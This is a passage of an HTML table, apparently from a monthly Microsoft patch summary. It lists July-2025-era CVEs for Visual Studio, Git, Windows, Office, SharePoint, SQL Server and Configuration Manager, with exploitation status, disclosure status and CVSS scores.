V8</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr></tbody></table><h3></h3><h3>Developer Tools vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49739">CVE-2025-49739</a></td><td><p>Visual Studio Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49714">CVE-2025-49714</a></td><td><p>Visual Studio Code Python Extension Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48386">CVE-2025-48386</a></td><td><p>MITRE: CVE-2025-48386 Git Credential Helper Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48385">CVE-2025-48385</a></td><td><p>MITRE: CVE-2025-48385 Git Protocol Injection Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48384">CVE-2025-48384</a></td><td><p>MITRE: CVE-2025-48384 Git Symlink Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-46835">CVE-2025-46835</a></td><td><p>MITRE: CVE-2025-46835 Git File Overwrite Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-46334">CVE-2025-46334</a></td><td><p>MITRE: CVE-2025-46334 Git Malicious Shell Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27614">CVE-2025-27614</a></td><td><p>MITRE: CVE-2025-27614 Gitk Arbitrary Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27613">CVE-2025-27613</a></td><td><p>MITRE: CVE-2025-27613 Gitk Arguments Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr></tbody></table><h3></h3><h3>ESU Windows vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47981">CVE-2025-47981</a></td><td><p>SPNEGO Extended Negotiation (NEGOEX) Security Mechanism Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>9.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48824">CVE-2025-48824</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49657">CVE-2025-49657</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49670">CVE-2025-49670</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49672">CVE-2025-49672</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49674">CVE-2025-49674</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49676">CVE-2025-49676</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49688">CVE-2025-49688</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49753">CVE-2025-49753</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47998">CVE-2025-47998</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49663">CVE-2025-49663</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49668">CVE-2025-49668</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49669">CVE-2025-49669</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49673">CVE-2025-49673</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49729">CVE-2025-49729</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49687">CVE-2025-49687</a></td><td><p>Windows Input Method Editor (IME) Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47986">CVE-2025-47986</a></td><td><p>Universal Print Management Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48817">CVE-2025-48817</a></td><td><p>Remote Desktop Client Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49735">CVE-2025-49735</a></td><td><p>Windows KDC Proxy Service (KPSSVC) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49665">CVE-2025-49665</a></td><td><p>Workspace Broker Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49667">CVE-2025-49667</a></td><td><p>Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49659">CVE-2025-49659</a></td><td><p>Windows Transport Driver Interface (TDI) Translation Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49686">CVE-2025-49686</a></td><td><p>Windows TCP/IP Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47976">CVE-2025-47976</a></td><td><p>Windows Simple Search and Discovery Protocol (SSDP) Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48815">CVE-2025-48815</a></td><td><p>Windows Simple Search and Discovery Protocol (SSDP) Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49679">CVE-2025-49679</a></td><td><p>Windows Shell Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47996">CVE-2025-47996</a></td><td><p>Windows MBT Transport Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49742">CVE-2025-49742</a></td><td><p>Windows Graphics Component Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49732">CVE-2025-49732</a></td><td><p>Windows Graphics Component Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49721">CVE-2025-49721</a></td><td><p>Windows Fast FAT File System Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47985">CVE-2025-47985</a></td><td><p>Windows Event Tracing Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49660">CVE-2025-49660</a></td><td><p>Windows Event Tracing Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49661">CVE-2025-49661</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49730">CVE-2025-49730</a></td><td><p>Microsoft Windows QoS Scheduler Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49683">CVE-2025-49683</a></td><td><p>Microsoft Virtual Hard Disk Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47971">CVE-2025-47971</a></td><td><p>Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49689">CVE-2025-49689</a></td><td><p>Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47973">CVE-2025-47973</a></td><td><p>Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48805">CVE-2025-48805</a></td><td><p>Microsoft MPEG-2 Video Extension Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48806">CVE-2025-48806</a></td><td><p>Microsoft MPEG-2 Video Extension Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49675">CVE-2025-49675</a></td><td><p>Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48816">CVE-2025-48816</a></td><td><p>HID Class Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47987">CVE-2025-47987</a></td><td><p>Credential Security Support Provider Protocol (CredSSP) Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47984">CVE-2025-47984</a></td><td><p>Windows GDI Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48814">CVE-2025-48814</a></td><td><p>Remote Desktop Licensing Service Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48819">CVE-2025-48819</a></td><td><p>Windows Universal Plug and Play (UPnP) Device Host Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48821">CVE-2025-48821</a></td><td><p>Windows Universal Plug and Play (UPnP) Device Host Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47975">CVE-2025-47975</a></td><td><p>Windows Simple Search and Discovery Protocol (SSDP) Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49727">CVE-2025-49727</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49678">CVE-2025-49678</a></td><td><p>NTFS Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48001">CVE-2025-48001</a></td><td><p>BitLocker Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48804">CVE-2025-48804</a></td><td><p>BitLocker Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49671">CVE-2025-49671</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49681">CVE-2025-49681</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47980">CVE-2025-47980</a></td><td><p>Windows Imaging Component Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.2</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49716">CVE-2025-49716</a></td><td><p>Windows Netlogon Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.9</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49722">CVE-2025-49722</a></td><td><p>Windows Print Spooler Denial of Service Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49664">CVE-2025-49664</a></td><td><p>Windows User-Mode Driver Framework Host Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49658">CVE-2025-49658</a></td><td><p>Windows Transport Driver Interface (TDI) Translation Driver Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49684">CVE-2025-49684</a></td><td><p>Windows Storage Port Driver Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48808">CVE-2025-48808</a></td><td><p>Windows Kernel Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr></tbody></table><h3></h3><h3>Microsoft Office vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49704">CVE-2025-49704</a></td><td><p>Microsoft SharePoint Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49701">CVE-2025-49701</a></td><td><p>Microsoft SharePoint Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49695">CVE-2025-49695</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49696">CVE-2025-49696</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49697">CVE-2025-49697</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49703">CVE-2025-49703</a></td><td><p>Microsoft Word Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49698">CVE-2025-49698</a></td><td><p>Microsoft Word Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49700">CVE-2025-49700</a></td><td><p>Microsoft Word Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49705">CVE-2025-49705</a></td><td><p>Microsoft PowerPoint Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49702">CVE-2025-49702</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47994">CVE-2025-47994</a></td><td><p>Microsoft Office Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49711">CVE-2025-49711</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49737">CVE-2025-49737</a></td><td><p>Microsoft Teams Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49699">CVE-2025-49699</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49706">CVE-2025-49706</a></td><td><p>Microsoft SharePoint Server Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.3</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48812">CVE-2025-48812</a></td><td><p>Microsoft Excel Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49756">CVE-2025-49756</a></td><td><p>Office Developer Platform Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>3.3</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49731">CVE-2025-49731</a></td><td><p>Microsoft Teams Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>3.1</p></td></tr></tbody></table><h3></h3><h3>SQL Server vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49717">CVE-2025-49717</a></td><td><p>Microsoft SQL Server Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49719">CVE-2025-49719</a></td><td><p>Microsoft SQL Server Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>Yes</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49718">CVE-2025-49718</a></td><td><p>Microsoft SQL Server Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr></tbody></table><h3></h3><h3>System Center vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47178">CVE-2025-47178</a></td><td><p>Microsoft Configuration Manager Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8</p></td></tr></tbody></table><h3></h3><h3>Windows vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49723">CVE-2025-49723</a></td><td><p>Windows StateRepository API Server file Tampering Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49740">CVE-2025-49740</a></td><td><p>Windows SmartScreen Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49724">CVE-2025-49724</a></td><td><p>Windows Connected Devices Platform Service Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48822">CVE-2025-48822</a></td><td><p>Windows Hyper-V Discrete Device Assignment (DDA) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.6</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-33054">CVE-2025-33054</a></td><td><p>Remote Desktop Spoofing Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49691">CVE-2025-49691</a></td><td><p>Windows Miracast Wireless Display Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47972">CVE-2025-47972</a></td><td><p>Windows Input Method Editor (IME) Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47159">CVE-2025-47159</a></td><td><p>Windows Virtualization-Based Security (VBS) Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48799">CVE-2025-48799</a></td><td><p>Windows Update Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47982">CVE-2025-47982</a></td><td><p>Windows Storage VSP Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49726">CVE-2025-49726</a></td><td><p>Windows Notification Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49725">CVE-2025-49725</a></td><td><p>Windows Notification Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47991">CVE-2025-47991</a></td><td><p>Windows Input Method Editor (IME) Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48000">CVE-2025-48000</a></td><td><p>Windows Connected Devices Platform Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a 